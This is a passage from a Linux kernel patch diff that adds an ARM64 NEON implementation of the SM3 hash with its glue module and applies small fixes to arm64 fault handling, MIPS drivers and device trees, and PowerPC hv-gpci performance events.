++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  9, 1, IW, SCHED_W_W1W2W3W4W5W0_1, 15)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 10, 2, IW, SCHED_W_W1W2W3W4W5W0_2, 15)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  11, 3, IW, SCHED_W_W1W2W3W4W5W0_3, 15)
++
++	/* Transform 12-14 + Precalc 18-20 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 12, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 18)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  13, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 18)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 14, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 18)
++
++	/* Transform 15-17 + Precalc 21-23 */
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  15, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 21)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 16, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 21)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  17, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 21)
++
++	/* Transform 18-20 + Precalc 24-26 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 18, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 24)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  19, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 24)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 20, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 24)
++
++	/* Transform 21-23 + Precalc 27-29 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  21, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 27)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 22, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 27)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  23, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 27)
++
++	/* Transform 24-26 + Precalc 30-32 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 24, 0, XW, SCHED_W_W0W1W2W3W4W5_1, 30)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  25, 1, XW, SCHED_W_W0W1W2W3W4W5_2, 30)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 26, 2, XW, SCHED_W_W0W1W2W3W4W5_3, 30)
++
++	/* Transform 27-29 + Precalc 33-35 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  27, 0, XW, SCHED_W_W1W2W3W4W5W0_1, 33)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 28, 1, XW, SCHED_W_W1W2W3W4W5W0_2, 33)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  29, 2, XW, SCHED_W_W1W2W3W4W5W0_3, 33)
++
++	/* Transform 30-32 + Precalc 36-38 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 30, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 36)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  31, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 36)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 32, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 36)
++
++	/* Transform 33-35 + Precalc 39-41 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  33, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 39)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 34, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 39)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  35, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 39)
++
++	/* Transform 36-38 + Precalc 42-44 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 36, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 42)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  37, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 42)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 38, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 42)
++
++	/* Transform 39-41 + Precalc 45-47 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  39, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 45)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 40, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 45)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  41, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 45)
++
++	/* Transform 42-44 + Precalc 48-50 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 42, 0, XW, SCHED_W_W0W1W2W3W4W5_1, 48)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  43, 1, XW, SCHED_W_W0W1W2W3W4W5_2, 48)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 44, 2, XW, SCHED_W_W0W1W2W3W4W5_3, 48)
++
++	/* Transform 45-47 + Precalc 51-53 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  45, 0, XW, SCHED_W_W1W2W3W4W5W0_1, 51)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 46, 1, XW, SCHED_W_W1W2W3W4W5W0_2, 51)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  47, 2, XW, SCHED_W_W1W2W3W4W5W0_3, 51)
++
++	/* Transform 48-50 + Precalc 54-56 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 48, 0, XW, SCHED_W_W2W3W4W5W0W1_1, 54)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  49, 1, XW, SCHED_W_W2W3W4W5W0W1_2, 54)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 50, 2, XW, SCHED_W_W2W3W4W5W0W1_3, 54)
++
++	/* Transform 51-53 + Precalc 57-59 */
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  51, 0, XW, SCHED_W_W3W4W5W0W1W2_1, 57)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 52, 1, XW, SCHED_W_W3W4W5W0W1W2_2, 57)
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  53, 2, XW, SCHED_W_W3W4W5W0W1W2_3, 57)
++
++	/* Transform 54-56 + Precalc 60-62 */
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 54, 0, XW, SCHED_W_W4W5W0W1W2W3_1, 60)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  55, 1, XW, SCHED_W_W4W5W0W1W2W3_2, 60)
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 56, 2, XW, SCHED_W_W4W5W0W1W2W3_3, 60)
++
++	/* Transform 57-59 + Precalc 63 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  57, 0, XW, SCHED_W_W5W0W1W2W3W4_1, 63)
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 58, 1, XW, SCHED_W_W5W0W1W2W3W4_2, 63)
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  59, 2, XW, SCHED_W_W5W0W1W2W3W4_3, 63)
++
++	/* Transform 60 */
++	R2(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 60, 0, XW, _, _)
++	subs		RNBLKS, RNBLKS, #1
++	b.eq		.Lend
++
++	/* Transform 61-63 + Preload next block */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  61, 1, XW, LOAD_W_VEC_1, _)
++	ldp		s0, s1, [RSTATE, #0]
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 62, 2, XW, LOAD_W_VEC_2, _)
++	ldp		s2, s3, [RSTATE, #8]
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  63, 0, XW, LOAD_W_VEC_3, _)
++
++	/* Update the chaining variables. */
++	eor		ra, ra, s0
++	eor		rb, rb, s1
++	ldp		s0, s1, [RSTATE, #16]
++	eor		rc, rc, s2
++	ldp		k_even, k_odd, [RSTATE, #24]
++	eor		rd, rd, s3
++	eor		re, re, s0
++	stp		ra, rb, [RSTATE, #0]
++	eor		rf, rf, s1
++	stp		rc, rd, [RSTATE, #8]
++	eor		rg, rg, k_even
++	stp		re, rf, [RSTATE, #16]
++	eor		rh, rh, k_odd
++	stp		rg, rh, [RSTATE, #24]
++	b		.Loop
++
++.Lend:
++	/* Transform 61-63 */
++	R2(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  61, 1, XW, _, _)
++	ldp		s0, s1, [RSTATE, #0]
++	R2(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 62, 2, XW, _, _)
++	ldp		s2, s3, [RSTATE, #8]
++	R2(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  63, 0, XW, _, _)
++
++	/* Update the chaining variables. */
++	eor		ra, ra, s0
++	clear_vec(W0)
++	eor		rb, rb, s1
++	clear_vec(W1)
++	ldp		s0, s1, [RSTATE, #16]
++	clear_vec(W2)
++	eor		rc, rc, s2
++	clear_vec(W3)
++	ldp		k_even, k_odd, [RSTATE, #24]
++	clear_vec(W4)
++	eor		rd, rd, s3
++	clear_vec(W5)
++	eor		re, re, s0
++	clear_vec(XTMP0)
++	stp		ra, rb, [RSTATE, #0]
++	clear_vec(XTMP1)
++	eor		rf, rf, s1
++	clear_vec(XTMP2)
++	stp		rc, rd, [RSTATE, #8]
++	clear_vec(XTMP3)
++	eor		rg, rg, k_even
++	clear_vec(XTMP4)
++	stp		re, rf, [RSTATE, #16]
++	clear_vec(XTMP5)
++	eor		rh, rh, k_odd
++	clear_vec(XTMP6)
++	stp		rg, rh, [RSTATE, #24]
++
++	/* Clear message expansion area */
++	add		addr0, sp, #STACK_W
++	st1		{W0.16b-W3.16b}, [addr0], #64
++	st1		{W0.16b-W3.16b}, [addr0], #64
++	st1		{W0.16b-W3.16b}, [addr0]
++
++	mov		sp, RFRAME
++
++	ldp		x25, x26, [sp], #16
++	ldp		x23, x24, [sp], #16
++	ldp		x21, x22, [sp], #16
++	ldp		x19, x20, [sp], #16
++	ldp		x28, x29, [sp], #16
++
++	ret
++SYM_FUNC_END(sm3_neon_transform)
++
++
++	.section	".rodata", "a"
++
++	.align 4
++.LKtable:
++	.long 0x79cc4519, 0xf3988a32, 0xe7311465, 0xce6228cb
++	.long 0x9cc45197, 0x3988a32f, 0x7311465e, 0xe6228cbc
++	.long 0xcc451979, 0x988a32f3, 0x311465e7, 0x6228cbce
++	.long 0xc451979c, 0x88a32f39, 0x11465e73, 0x228cbce6
++	.long 0x9d8a7a87, 0x3b14f50f, 0x7629ea1e, 0xec53d43c
++	.long 0xd8a7a879, 0xb14f50f3, 0x629ea1e7, 0xc53d43ce
++	.long 0x8a7a879d, 0x14f50f3b, 0x29ea1e76, 0x53d43cec
++	.long 0xa7a879d8, 0x4f50f3b1, 0x9ea1e762, 0x3d43cec5
++	.long 0x7a879d8a, 0xf50f3b14, 0xea1e7629, 0xd43cec53
++	.long 0xa879d8a7, 0x50f3b14f, 0xa1e7629e, 0x43cec53d
++	.long 0x879d8a7a, 0x0f3b14f5, 0x1e7629ea, 0x3cec53d4
++	.long 0x79d8a7a8, 0xf3b14f50, 0xe7629ea1, 0xcec53d43
++	.long 0x9d8a7a87, 0x3b14f50f, 0x7629ea1e, 0xec53d43c
++	.long 0xd8a7a879, 0xb14f50f3, 0x629ea1e7, 0xc53d43ce
++	.long 0x8a7a879d, 0x14f50f3b, 0x29ea1e76, 0x53d43cec
++	.long 0xa7a879d8, 0x4f50f3b1, 0x9ea1e762, 0x3d43cec5
+diff --git a/arch/arm64/crypto/sm3-neon-glue.c b/arch/arm64/crypto/sm3-neon-glue.c
+new file mode 100644
+index 0000000000000..7182ee683f14a
+--- /dev/null
++++ b/arch/arm64/crypto/sm3-neon-glue.c
+@@ -0,0 +1,103 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * sm3-neon-glue.c - SM3 secure hash using NEON instructions
++ *
++ * Copyright (C) 2022 Tianjia Zhang <tianjia.zhang@linux.alibaba.com>
++ */
++
++#include <asm/neon.h>
++#include <asm/simd.h>
++#include <asm/unaligned.h>
++#include <crypto/internal/hash.h>
++#include <crypto/internal/simd.h>
++#include <crypto/sm3.h>
++#include <crypto/sm3_base.h>
++#include <linux/cpufeature.h>
++#include <linux/crypto.h>
++#include <linux/module.h>
++
++
++asmlinkage void sm3_neon_transform(struct sm3_state *sst, u8 const *src,
++				   int blocks);
++
++static int sm3_neon_update(struct shash_desc *desc, const u8 *data,
++			   unsigned int len)
++{
++	if (!crypto_simd_usable()) {
++		sm3_update(shash_desc_ctx(desc), data, len);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	sm3_base_do_update(desc, data, len, sm3_neon_transform);
++	kernel_neon_end();
++
++	return 0;
++}
++
++static int sm3_neon_final(struct shash_desc *desc, u8 *out)
++{
++	if (!crypto_simd_usable()) {
++		sm3_final(shash_desc_ctx(desc), out);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	sm3_base_do_finalize(desc, sm3_neon_transform);
++	kernel_neon_end();
++
++	return sm3_base_finish(desc, out);
++}
++
++static int sm3_neon_finup(struct shash_desc *desc, const u8 *data,
++			  unsigned int len, u8 *out)
++{
++	if (!crypto_simd_usable()) {
++		struct sm3_state *sctx = shash_desc_ctx(desc);
++
++		if (len)
++			sm3_update(sctx, data, len);
++		sm3_final(sctx, out);
++		return 0;
++	}
++
++	kernel_neon_begin();
++	if (len)
++		sm3_base_do_update(desc, data, len, sm3_neon_transform);
++	sm3_base_do_finalize(desc, sm3_neon_transform);
++	kernel_neon_end();
++
++	return sm3_base_finish(desc, out);
++}
++
++static struct shash_alg sm3_alg = {
++	.digestsize		= SM3_DIGEST_SIZE,
++	.init			= sm3_base_init,
++	.update			= sm3_neon_update,
++	.final			= sm3_neon_final,
++	.finup			= sm3_neon_finup,
++	.descsize		= sizeof(struct sm3_state),
++	.base.cra_name		= "sm3",
++	.base.cra_driver_name	= "sm3-neon",
++	.base.cra_blocksize	= SM3_BLOCK_SIZE,
++	.base.cra_module	= THIS_MODULE,
++	.base.cra_priority	= 200,
++};
++
++static int __init sm3_neon_init(void)
++{
++	return crypto_register_shash(&sm3_alg);
++}
++
++static void __exit sm3_neon_fini(void)
++{
++	crypto_unregister_shash(&sm3_alg);
++}
++
++module_init(sm3_neon_init);
++module_exit(sm3_neon_fini);
++
++MODULE_DESCRIPTION("SM3 secure hash using NEON instructions");
++MODULE_AUTHOR("Jussi Kivilinna <jussi.kivilinna@iki.fi>");
++MODULE_AUTHOR("Tianjia Zhang <tianjia.zhang@linux.alibaba.com>");
++MODULE_LICENSE("GPL v2");
+diff --git a/arch/arm64/include/asm/processor.h b/arch/arm64/include/asm/processor.h
+index 445aa3af3b762..400f8956328b9 100644
+--- a/arch/arm64/include/asm/processor.h
++++ b/arch/arm64/include/asm/processor.h
+@@ -308,13 +308,13 @@ static inline void compat_start_thread(struct pt_regs *regs, unsigned long pc,
+ }
+ #endif
+ 
+-static inline bool is_ttbr0_addr(unsigned long addr)
++static __always_inline bool is_ttbr0_addr(unsigned long addr)
+ {
+ 	/* entry assembly clears tags for TTBR0 addrs */
+ 	return addr < TASK_SIZE;
+ }
+ 
+-static inline bool is_ttbr1_addr(unsigned long addr)
++static __always_inline bool is_ttbr1_addr(unsigned long addr)
+ {
+ 	/* TTBR1 addresses may have a tag if KASAN_SW_TAGS is in use */
+ 	return arch_kasan_reset_tag(addr) >= PAGE_OFFSET;
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 5b391490e045b..74f76514a48d0 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -353,6 +353,11 @@ static bool is_el1_mte_sync_tag_check_fault(unsigned long esr)
+ 	return false;
+ }
+ 
++static bool is_translation_fault(unsigned long esr)
++{
++	return (esr & ESR_ELx_FSC_TYPE) == ESR_ELx_FSC_FAULT;
++}
++
+ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 			      struct pt_regs *regs)
+ {
+@@ -385,7 +390,8 @@ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 	} else if (addr < PAGE_SIZE) {
+ 		msg = "NULL pointer dereference";
+ 	} else {
+-		if (kfence_handle_page_fault(addr, esr & ESR_ELx_WNR, regs))
++		if (is_translation_fault(esr) &&
++		    kfence_handle_page_fault(addr, esr & ESR_ELx_WNR, regs))
+ 			return;
+ 
+ 		msg = "paging request";
+diff --git a/arch/mips/bcm63xx/clk.c b/arch/mips/bcm63xx/clk.c
+index 6e6756e8fa0a9..86a6e25908664 100644
+--- a/arch/mips/bcm63xx/clk.c
++++ b/arch/mips/bcm63xx/clk.c
+@@ -361,6 +361,8 @@ static struct clk clk_periph = {
+  */
+ int clk_enable(struct clk *clk)
+ {
++	if (!clk)
++		return 0;
+ 	mutex_lock(&clocks_mutex);
+ 	clk_enable_unlocked(clk);
+ 	mutex_unlock(&clocks_mutex);
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index 37c46720c719a..f38c39572a9e8 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -438,7 +438,7 @@
+ 		ingenic,nemc-tAW = <50>;
+ 		ingenic,nemc-tSTRV = <100>;
+ 
+-		reset-gpios = <&gpf 12 GPIO_ACTIVE_HIGH>;
++		reset-gpios = <&gpf 12 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&eth0_power>;
+ 
+ 		interrupt-parent = <&gpe>;
+diff --git a/arch/mips/cavium-octeon/executive/cvmx-helper-board.c b/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
+index d09d0769f5496..0fd9ac76eb742 100644
+--- a/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
++++ b/arch/mips/cavium-octeon/executive/cvmx-helper-board.c
+@@ -211,7 +211,7 @@ union cvmx_helper_link_info __cvmx_helper_board_link_get(int ipd_port)
+ {
+ 	union cvmx_helper_link_info result;
+ 
+-	WARN(!octeon_is_simulation(),
++	WARN_ONCE(!octeon_is_simulation(),
+ 	     "Using deprecated link status - please update your DT");
+ 
+ 	/* Unless we fix it later, all links are defaulted to down */
+diff --git a/arch/mips/cavium-octeon/executive/cvmx-helper.c b/arch/mips/cavium-octeon/executive/cvmx-helper.c
+index 6f49fd9be1f3c..9abfc4bf9bd83 100644
+--- a/arch/mips/cavium-octeon/executive/cvmx-helper.c
++++ b/arch/mips/cavium-octeon/executive/cvmx-helper.c
+@@ -1096,7 +1096,7 @@ union cvmx_helper_link_info cvmx_helper_link_get(int ipd_port)
+ 		if (index == 0)
+ 			result = __cvmx_helper_rgmii_link_get(ipd_port);
+ 		else {
+-			WARN(1, "Using deprecated link status - please update your DT");
++			WARN_ONCE(1, "Using deprecated link status - please update your DT");
+ 			result.s.full_duplex = 1;
+ 			result.s.link_up = 1;
+ 			result.s.speed = 1000;
+diff --git a/arch/mips/kernel/vpe-cmp.c b/arch/mips/kernel/vpe-cmp.c
+index e673603e11e5d..92140edb3ce3e 100644
+--- a/arch/mips/kernel/vpe-cmp.c
++++ b/arch/mips/kernel/vpe-cmp.c
+@@ -75,7 +75,6 @@ ATTRIBUTE_GROUPS(vpe);
+ 
+ static void vpe_device_release(struct device *cd)
+ {
+-	kfree(cd);
+ }
+ 
+ static struct class vpe_class = {
+@@ -157,6 +156,7 @@ out_dev:
+ 	device_del(&vpe_device);
+ 
+ out_class:
++	put_device(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 
+ out_chrdev:
+@@ -169,7 +169,7 @@ void __exit vpe_module_exit(void)
+ {
+ 	struct vpe *v, *n;
+ 
+-	device_del(&vpe_device);
++	device_unregister(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 	unregister_chrdev(major, VPE_MODULE_NAME);
+ 
+diff --git a/arch/mips/kernel/vpe-mt.c b/arch/mips/kernel/vpe-mt.c
+index bad6b0891b2b5..84a82b551ec35 100644
+--- a/arch/mips/kernel/vpe-mt.c
++++ b/arch/mips/kernel/vpe-mt.c
+@@ -313,7 +313,6 @@ ATTRIBUTE_GROUPS(vpe);
+ 
+ static void vpe_device_release(struct device *cd)
+ {
+-	kfree(cd);
+ }
+ 
+ static struct class vpe_class = {
+@@ -497,6 +496,7 @@ out_dev:
+ 	device_del(&vpe_device);
+ 
+ out_class:
++	put_device(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 
+ out_chrdev:
+@@ -509,7 +509,7 @@ void __exit vpe_module_exit(void)
+ {
+ 	struct vpe *v, *n;
+ 
+-	device_del(&vpe_device);
++	device_unregister(&vpe_device);
+ 	class_unregister(&vpe_class);
+ 	unregister_chrdev(major, VPE_MODULE_NAME);
+ 
+diff --git a/arch/mips/ralink/of.c b/arch/mips/ralink/of.c
+index ea8072acf8d94..01c132bc33d54 100644
+--- a/arch/mips/ralink/of.c
++++ b/arch/mips/ralink/of.c
+@@ -21,6 +21,7 @@
+ #include <asm/bootinfo.h>
+ #include <asm/addrspace.h>
+ #include <asm/prom.h>
++#include <asm/mach-ralink/ralink_regs.h>
+ 
+ #include "common.h"
+ 
+@@ -81,7 +82,8 @@ static int __init plat_of_setup(void)
+ 	__dt_register_buses(soc_info.compatible, "palmbus");
+ 
+ 	/* make sure that the reset controller is setup early */
+-	ralink_rst_init();
++	if (ralink_soc != MT762X_SOC_MT7621AT)
++		ralink_rst_init();
+ 
+ 	return 0;
+ }
+diff --git a/arch/powerpc/boot/dts/turris1x.dts b/arch/powerpc/boot/dts/turris1x.dts
+index 045af668e9284..e9cda34a140e0 100644
+--- a/arch/powerpc/boot/dts/turris1x.dts
++++ b/arch/powerpc/boot/dts/turris1x.dts
+@@ -69,6 +69,20 @@
+ 				interrupt-parent = <&gpio>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_LOW>, /* GPIO12 - ALERT pin */
+ 					     <13 IRQ_TYPE_LEVEL_LOW>; /* GPIO13 - CRIT pin */
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				/* Local temperature sensor (SA56004ED internal) */
++				channel@0 {
++					reg = <0>;
++					label = "board";
++				};
++
++				/* Remote temperature sensor (D+/D- connected to P2020 CPU Temperature Diode) */
++				channel@1 {
++					reg = <1>;
++					label = "cpu";
++				};
+ 			};
+ 
+ 			/* DDR3 SPD/EEPROM */
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 8abae463f6c12..95fd7f9485d55 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -79,7 +79,7 @@
+ #define H_NOT_ENOUGH_RESOURCES -44
+ #define H_R_STATE       -45
+ #define H_RESCINDED     -46
+-#define H_P1		-54
++#define H_ABORTED	-54
+ #define H_P2		-55
+ #define H_P3		-56
+ #define H_P4		-57
+@@ -100,7 +100,6 @@
+ #define H_COP_HW	-74
+ #define H_STATE		-75
+ #define H_IN_USE	-77
+-#define H_ABORTED	-78
+ #define H_UNSUPPORTED_FLAG_START	-256
+ #define H_UNSUPPORTED_FLAG_END		-511
+ #define H_MULTI_THREADS_ACTIVE	-9005
+diff --git a/arch/powerpc/perf/callchain.c b/arch/powerpc/perf/callchain.c
+index 082f6d0308a47..8718289c051dd 100644
+--- a/arch/powerpc/perf/callchain.c
++++ b/arch/powerpc/perf/callchain.c
+@@ -61,6 +61,7 @@ perf_callchain_kernel(struct perf_callchain_entry_ctx *entry, struct pt_regs *re
+ 		next_sp = fp[0];
+ 
+ 		if (next_sp == sp + STACK_INT_FRAME_SIZE &&
++		    validate_sp(sp, current, STACK_INT_FRAME_SIZE) &&
+ 		    fp[STACK_FRAME_MARKER] == STACK_FRAME_REGS_MARKER) {
+ 			/*
+ 			 * This looks like an interrupt frame for an
+diff --git a/arch/powerpc/perf/hv-gpci-requests.h b/arch/powerpc/perf/hv-gpci-requests.h
+index 8965b4463d433..5e86371a20c78 100644
+--- a/arch/powerpc/perf/hv-gpci-requests.h
++++ b/arch/powerpc/perf/hv-gpci-requests.h
+@@ -79,6 +79,7 @@ REQUEST(__field(0,	8,	partition_id)
+ )
+ #include I(REQUEST_END)
+ 
++#ifdef ENABLE_EVENTS_COUNTERINFO_V6
+ /*
+  * Not available for counter_info_version >= 0x8, use
+  * run_instruction_cycles_by_partition(0x100) instead.
+@@ -92,6 +93,7 @@ REQUEST(__field(0,	8,	partition_id)
+ 	__count(0x10,	8,	cycles)
+ )
+ #include I(REQUEST_END)
++#endif
+ 
+ #define REQUEST_NAME system_performance_capabilities
+ #define REQUEST_NUM 0x40
+@@ -103,6 +105,7 @@ REQUEST(__field(0,	1,	perf_collect_privileged)
+ )
+ #include I(REQUEST_END)
+ 
++#ifdef ENABLE_EVENTS_COUNTERINFO_V6
+ #define REQUEST_NAME processor_bus_utilization_abc_links
+ #define REQUEST_NUM 0x50
+ #define REQUEST_IDX_KIND "hw_chip_id=?"
+@@ -194,6 +197,7 @@ REQUEST(__field(0,	4,	phys_processor_idx)
+ 	__count(0x28,	8,	instructions_completed)
+ )
+ #include I(REQUEST_END)
++#endif
+ 
+ /* Processor_core_power_mode (0x95) skipped, no counters */
+ /* Affinity_domain_information_by_virtual_processor (0xA0) skipped,
+diff --git a/arch/powerpc/perf/hv-gpci.c b/arch/powerpc/perf/hv-gpci.c
+index 5eb60ed5b5e8a..7ff8ff3509f5f 100644
+--- a/arch/powerpc/perf/hv-gpci.c
++++ b/arch/powerpc/perf/hv-gpci.c
+@@ -70,9 +70,9 @@ static const struct attribute_group format_group = {
+ 	.attrs = format_attrs,
+ };
+ 
+-static const struct attribute_group event_group = {
++static struct attribute_group event_group = {
+ 	.name  = "events",
+-	.attrs = hv_gpci_event_attrs,
++	/* .attrs is set in init */
+ };
+ 
+ #define HV_CAPS_ATTR(_name, _format)				\
+@@ -330,6 +330,7 @@ static int hv_gpci_init(void)
+ 	int r;
+ 	unsigned long hret;
+ 	struct hv_perf_caps caps;
++	struct hv_gpci_request_buffer *arg;
+ 
+ 	hv_gpci_assert_offsets_correct();
+ 
+@@ -353,6 +354,36 @@ static int hv_gpci_init(void)
+ 	/* sampling not supported */
+ 	h_gpci_pmu.capabilities |= PERF_PMU_CAP_NO_INTERRUPT;
+ 
++	arg = (void *)get_cpu_var(hv_gpci_reqb);
++	memset(arg, 0, HGPCI_REQ_BUFFER_SIZE);
++
++	/*
++	 * hcall H_GET_PERF_COUNTER_INFO populates the output
++	 * counter_info_version value based on the system hypervisor.
++	 * Pass the counter request 0x10 corresponds to request type
++	 * 'Dispatch_timebase_by_processor', to get the supported
++	 * counter_info_version.
++	 */
++	arg->params.counter_request = cpu_to_be32(0x10);
++
++	r = plpar_hcall_norets(H_GET_PERF_COUNTER_INFO,
++			virt_to_phys(arg), HGPCI_REQ_BUFFER_SIZE);
++	if (r) {
++		pr_devel("hcall failed, can't get supported counter_info_version: 0x%x\n", r);
++		arg->params.counter_info_version_out = 0x8;
++	}
++
++	/*
++	 * Use counter_info_version_out value to assign
++	 * required hv-gpci event list.
++	 */
++	if (arg->params.counter_info_version_out >= 0x8)
++		event_group.attrs = hv_gpci_event_attrs;
++	else
++		event_group.attrs = hv_gpci_event_attrs_v6;
++
++	put_cpu_var(hv_gpci_reqb);
++
+ 	r = perf_pmu_register(&h_gpci_pmu, h_gpci_pmu.name, -1);
+ 	if (r)
+ 		return r;
+diff --git a/arch/powerpc/perf/hv-gpci.h b/arch/powerpc/perf/hv-gpci.h
+index 4d108262bed79..c72020912dea5 100644
+--- a/arch/powerpc/perf/hv-gpci.h
++++ b/arch/powerpc/perf/hv-gpci.h
+@@ -26,6 +26,7 @@ enum {
+ #define REQUEST_FILE "../hv-gpci-requests.h"
+ #define NAME_LOWER hv_gpci
+ #define NAME_UPPER HV_GPCI
++#define ENABLE_EVENTS_COUNTERINFO_V6
+ #include "req-gen/perf.h"
+ #undef REQUEST_FILE
+ #undef NAME_LOWER
+diff --git a/arch/powerpc/perf/req-gen/perf.h b/arch/powerpc/perf/req-gen/perf.h
+index fa9bc804e67af..6b2a59fefffa7 100644
+--- a/arch/powerpc/perf/req-gen/perf.h
++++ b/arch/powerpc/perf/req-gen/perf.h
+@@ -139,6 +139,26 @@ PMU_EVENT_ATTR_STRING(							\
+ #define REQUEST_(r_name, r_value, r_idx_1, r_fields)			\
+ 	r_fields
+ 
++/* Generate event list for platforms with counter_info_version 0x6 or below */
++static __maybe_unused struct attribute *hv_gpci_event_attrs_v6[] = {
++#include REQUEST_FILE
++	NULL
++};
++
++/*
++ * Based on getPerfCountInfo v1.018 documentation, some of the hv-gpci
++ * events were deprecated for platform firmware that supports
++ * counter_info_version 0x8 or above.
++ * Those deprecated events are still part of platform firmware that
++ * support counter_info_version 0x6 and below. As per the getPerfCountInfo
